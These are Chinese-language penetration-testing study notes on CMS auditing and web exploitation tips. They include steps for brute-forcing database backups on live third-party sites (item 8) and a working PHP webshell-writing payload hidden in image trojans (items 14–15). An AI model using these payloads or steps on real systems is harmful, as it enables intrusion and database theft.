網絡安全進階篇（十一章-2） 0day審計思路（下）

					本章內容：對上一章的補充

一、總結

1，一些cms的漏洞僅能在特定的版本中才可以復現

2，php.ini文件修改後，需要重啓phpstudy生效

3，如果自己搭建的cms註冊一直出現問題的話，可能是session出了問題

4，一個網站的一個地方存在注入，其他地方也會高概率存在注入
	比如，在用戶登錄處存在注入，那麼管理員登錄也大概率會存在

5，後臺比前臺脆弱的多；內網比外網脆弱的多

6，魔術引號的使用範圍	（寬字節的核心--繞開魔術引號）

		魔術引號僅僅可以影響get、post、cookie傳參
		所以可以通過head傳參繞過	//即$_SERVER()獲取的頭信息
	
					-->		稍微進階   --->		
		
		一些網站如果支持匿名(遊客)評論的，一般都會獲取你的IP，
		因爲匿名發佈一些不良信息，得追查到你

7，	在此補充一下防禦xss的方法
		~過濾掉 ' " <  >  這四種符號
		
		~對上述符號進行實體化編碼
			即讓符號被當作字符串去顯示，而不是標籤去解析
			這些操作一般都是通過一些函數去完成的，白盒審計注意一下
			
			另外，黑盒測試有html實體編碼時，可以直接 ' " < >四種一起輸入
			看看哪些符號被過濾了。如果過濾不全的話，可以用事件型xss打進去
			
		例如：
			輸出字符	描述		實體名稱	實體編號
				<		小於號		  &lt;		   &#60;
				>		大於號		  &gt;		   &#62;
				&		和號		  &amp;		   &#38;
				“		引號		  &quot;	   &#34;

8，後臺的漏洞更多，
		比如，有的CMS後臺提供備份數據庫sql的功能，命名又以時間命名(20200325)
		這個文件若不加限制，普通用戶也可以訪問。這就很危險
			步驟：
					~找用此cms搭建的網站，
					~白盒審計知道此備份sql的存放位置，如：url/aa/20200325
					~burp對找到的目標網站爆破指定位置url/aa/XXXXXXXX
					~XXXXXXXX可以從20180101~至今
					~爆出文件。下載，用本機的數據庫管理程序打開
					~現在你就相當於拖庫了目標站點，你可以獲取數據庫的所有信息
		
		後臺的漏洞多的很，這僅僅是拋磚引玉，大家自己去試試更好
	
		本質：後臺比前臺脆弱的多；內網比外網脆弱的多
					
9，sqlmap的*的本質
		sql的諺語，星號之後衆生平等//聽着好中二。
			爲什麼加個*就會實現精準打擊呢？		
		
		其本質就是sqlmap會在*的地方進行語句的替換，比如：
		
		url id=1*	-->  	運行的過程就替換爲 url id=1 and 1=1等等
		
10，本地測試，不知道自己的傳參後 發生了什麼
		修改原文件，在下邊直接加一行：	
				echo 上一句			//直觀的看到傳參後發生了什麼
		
		//在本地測試，很多東西幹就行，沒有就自己寫一個
		//當然這需要一定的代碼功底與經驗
		
11，代碼功底差，沒實戰經驗怎麼辦？
		去網上找找已經爆出cms的漏洞，試着復原，跟這人家一步步操作
		操作一兩次就熟悉了。
		
12，win系統文件路徑長度有限制
		例：C://123/123/123/234/435/。。。。。。/123.txt
		
		如果你這個路徑過長，後邊的就會被系統扔掉。這個長度具體是256個字符
		即，256後的字符串會被丟棄
		
		~另外，在路徑後邊加 . 會被去掉即
			123.txt....		最終是   123.txt
	
	綜上兩條，我們在滲透的過程中我們的傳參後，被拼接了別的內容。
	我們就可以同過加 . 的方法讓後邊開發本意拼接的內容失效

	注意：這個截斷問題在php5.2以上的版本已經修復
			本質就是，include等一些函數獲取到的長度過長，就會不執行
			
			另外，文件上傳的00截斷在5.2以上版本也不行。
			修復了 00 被當作終結符的bug。
			多提一句，00 本身就不應該代表截斷，本身就是一個bug

13，圖片馬成功的條件
		1，能傳入到服務器且語句沒有進行渲染
		2，傳入的馬被相對於的語言解析了（如php或asp）
		
		一百個網站，有90以上的概率可以上傳成功圖片馬
		但是一萬個網站，能有一個被對應語句解析都不錯
		
				即文件包含很有必要
				
14，文件包含得到的木馬無法直接使用
		即有的圖片馬無法直接通過文件包含連接菜刀，如需要cookie
		這個時候，phpinfo()是可以執行，即這個地方可以執行語句
		我們讓他執行   “寫一個一句馬” 的語句就行了
		具體代碼:
			eval(file_put_contents('8.php','<?php eval($_REQUEST[a])?>'))
			
	進階：但是如果這個傳參有魔術引號過濾，如何辦？
		很簡單，將我們的圖片馬的內容直接寫上邊的代碼呀
		即圖片馬的內容：
			<?php eval(file_put_contents('8.php','<?php eval($_REQUEST[a])?>')) ?>
		這樣一執行文件包含，我們的馬就被寫好了

15，本機測試的一些騷操作
		有時候，我們上傳的木馬沒有解析成功，會不會是我們的木馬有問題？
				~找到我們的圖片馬的位置，
				~直接將文件改爲1.php
				~訪問這個1.php看看有沒有報錯
		
			因爲是咱們本機測測，思維不要那麼侷限
				
		題外話，有的圖片馬在製作的過稱之中會發生一些很奇怪的問題導致
		我們的圖片馬中的代碼沒有執行。對這種問題，最簡單的辦法就是
			換一個圖片做圖片馬
		
		另外，有的木馬連接不上，也沒錯誤。換別的版本的菜刀試試

寄語：願星光不負趕路人